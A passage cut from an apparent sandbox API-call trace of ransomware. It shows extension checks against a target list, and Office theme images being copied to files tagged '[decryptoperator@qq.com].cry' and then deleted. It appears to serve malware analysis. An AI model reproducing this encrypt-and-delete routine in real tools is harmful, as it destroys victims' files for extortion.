Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.304] lstrlenW (lpString=".jpg") returned 4 [0044.304] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.305] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.305] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.306] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3479) returned 1 [0044.306] CloseHandle (hObject=0x188) returned 1 [0044.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 0x20 [0044.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.308] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.308] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.319] GetLastError () returned 0x0 [0044.319] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xd97, lpOverlapped=0x0) returned 1 [0044.328] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xda0, lpOverlapped=0x0) returned 1 [0044.328] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.328] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.328] SetEndOfFile (hFile=0x1fc) returned 1 [0044.329] CloseHandle (hObject=0x1fc) returned 1 [0044.329] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.329] SetEndOfFile (hFile=0x188) returned 1 [0044.329] CloseHandle (hObject=0x188) returned 1 [0044.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.330] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 1 [0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.330] lstrlenW (lpString=".doc") returned 4 [0044.330] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.330] lstrlenW (lpString=".docx") returned 5 [0044.330] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.330] lstrlenW (lpString=".pdf") returned 4 [0044.330] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.330] lstrlenW (lpString=".xls") returned 4 [0044.330] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.330] lstrlenW (lpString=".xlsx") returned 5 [0044.330] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.330] lstrlenW (lpString=".ppt") returned 4 [0044.330] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.330] lstrlenW (lpString=".zip") returned 4 [0044.330] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.330] lstrlenW (lpString=".rar") returned 4 [0044.330] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.330] lstrlenW (lpString=".bz2") returned 4 [0044.330] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.330] lstrlenW (lpString=".7z") returned 3 [0044.330] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.330] lstrlenW (lpString=".dbf") returned 4 [0044.331] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".1cd") returned 4 [0044.331] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".jpg") returned 4 [0044.331] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".doc") returned 4 [0044.331] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.331] lstrlenW (lpString=".docx") returned 5 [0044.331] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.331] lstrlenW (lpString=".pdf") returned 4 [0044.331] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.331] lstrlenW (lpString=".xls") returned 4 [0044.331] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.331] lstrlenW (lpString=".xlsx") returned 5 [0044.331] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.331] lstrlenW (lpString=".ppt") returned 4 [0044.331] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".zip") returned 4 [0044.331] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.331] lstrlenW (lpString=".rar") returned 4 [0044.331] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.331] lstrlenW (lpString=".bz2") returned 4 [0044.331] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.331] lstrlenW (lpString=".7z") returned 3 [0044.331] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".dbf") returned 4 [0044.331] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".1cd") returned 4 [0044.331] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.331] lstrlenW (lpString=".jpg") returned 4 [0044.331] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.332] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.332] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.332] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=31837) returned 1 [0044.332] CloseHandle (hObject=0x188) returned 1 [0044.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 0x20 [0044.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.332] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.332] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.333] GetLastError () returned 0x0 [0044.333] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x7c5d, lpOverlapped=0x0) returned 1 [0044.375] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7c60, lpOverlapped=0x0) returned 1 [0044.376] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.377] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.377] SetEndOfFile (hFile=0x1fc) returned 1 [0044.377] CloseHandle (hObject=0x1fc) returned 1 [0044.377] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.377] SetEndOfFile (hFile=0x188) returned 1 [0044.378] CloseHandle (hObject=0x188) returned 1 [0044.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.378] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1 [0044.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.378] lstrlenW (lpString=".doc") returned 4 [0044.378] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.378] lstrlenW (lpString=".docx") returned 5 [0044.378] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.378] lstrlenW (lpString=".pdf") returned 4 [0044.378] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString=".xls") returned 4 [0044.379] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.379] lstrlenW (lpString=".xlsx") returned 5 [0044.379] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.379] lstrlenW (lpString=".ppt") returned 4 [0044.379] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.379] lstrlenW (lpString=".zip") returned 4 [0044.379] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.379] lstrlenW (lpString=".rar") returned 4 [0044.379] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.379] lstrlenW (lpString=".bz2") returned 4 [0044.379] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString=".7z") returned 3 [0044.379] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.379] lstrlenW (lpString=".dbf") returned 4 [0044.379] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.379] lstrlenW (lpString=".1cd") returned 4 [0044.379] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.379] lstrlenW (lpString=".jpg") returned 4 [0044.379] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.379] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.379] lstrlenW (lpString=".doc") returned 4 [0044.379] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString=".docx") returned 5 [0044.379] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.379] lstrlenW (lpString=".pdf") returned 4 [0044.379] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.379] lstrlenW (lpString=".xls") returned 4 [0044.379] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.379] lstrlenW (lpString=".xlsx") returned 5 [0044.379] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.379] lstrlenW (lpString=".ppt") returned 4 [0044.380] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.380] lstrlenW (lpString=".zip") returned 4 [0044.380] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.380] lstrlenW (lpString=".rar") returned 4 [0044.380] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.380] lstrlenW (lpString=".bz2") returned 4 [0044.380] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.380] lstrlenW (lpString=".7z") returned 3 [0044.380] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.380] lstrlenW (lpString=".dbf") returned 4 [0044.380] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.380] lstrlenW (lpString=".1cd") returned 4 [0044.380] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.380] lstrlenW (lpString=".jpg") returned 4 [0044.380] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.380] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.380] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.380] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.380] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2722) returned 1 [0044.381] CloseHandle (hObject=0x188) returned 1 [0044.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 0x20 [0044.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.381] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.381] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.430] GetLastError () returned 0x0 [0044.430] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xaa2, lpOverlapped=0x0) returned 1 [0044.440] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xab0, lpOverlapped=0x0) returned 1 [0044.441] ReadFile (in: hFile=0x188, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.441] WriteFile (in: hFile=0x1fc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.441] SetEndOfFile (hFile=0x1fc) returned 1 [0044.441] CloseHandle (hObject=0x1fc) returned 1 [0044.441] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.441] SetEndOfFile (hFile=0x188) returned 1 [0044.442] CloseHandle (hObject=0x188) returned 1 [0044.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.442] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 1 [0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.442] lstrlenW (lpString=".doc") returned 4 [0044.442] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.442] lstrlenW (lpString=".docx") returned 5 [0044.442] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.442] lstrlenW (lpString=".pdf") returned 4 [0044.442] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.442] lstrlenW (lpString=".xls") returned 4 [0044.442] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.442] lstrlenW (lpString=".xlsx") returned 5 [0044.442] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.443] lstrlenW (lpString=".ppt") returned 4 [0044.443] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString=".zip") returned 4 [0044.443] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString=".rar") returned 4 [0044.443] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString=".bz2") returned 4 [0044.443] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.443] lstrlenW (lpString=".7z") returned 3 [0044.443] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString=".dbf") returned 4 [0044.443] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString=".1cd") returned 4 [0044.443] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString=".jpg") returned 4 [0044.443] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString=".doc") returned 4 [0044.443] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.443] lstrlenW (lpString=".docx") returned 5 [0044.443] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.443] lstrlenW (lpString=".pdf") returned 4 [0044.443] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString=".xls") returned 4 [0044.443] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString=".xlsx") returned 5 [0044.443] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.443] lstrlenW (lpString=".ppt") returned 4 [0044.443] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.443] lstrlenW (lpString=".zip") returned 4 [0044.443] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.443] lstrlenW (lpString=".rar") returned 4 [0044.444] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.444] lstrlenW (lpString=".bz2") returned 4 [0044.444] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.444] lstrlenW (lpString=".7z") returned 3 [0044.444] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.444] lstrlenW (lpString=".dbf") returned 4 [0044.444] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 